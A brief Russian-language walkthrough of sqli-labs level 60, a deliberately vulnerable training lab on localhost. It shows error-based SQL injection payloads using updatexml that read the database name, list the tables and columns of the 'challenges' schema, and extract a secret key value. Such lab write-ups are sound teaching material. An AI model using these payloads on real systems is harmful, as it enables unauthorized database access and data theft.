sqli-labs (меньше-60)
Войдите в 60 уровней, войдите напрямую
http://127.0.0.1/sql1/Less-60/?id=1'
Страница нормальная, введите
http://127.0.0.1/sql1/Less-60/?id=1"
Согласно сообщению об ошибке, считается, что метод закрытия - ") - +, и это инъекция символов.
Поскольку имеется полное сообщение об ошибке, мы используем здесь атаку путем инъекции ошибок.
Просмотреть текущую библиотеку
http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
Просмотреть все таблицы в библиотеке задач
http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
Просмотреть все поля под таблицей hsdu08stwn
http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='hsdu08stwn'),0x7e),1)--+
Просмотрите значение в поле secret_A755
http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_A755) from challenges.hsdu08stwn),0x7e),1)--+
Успешно отправьте запрошенный КЛЮЧ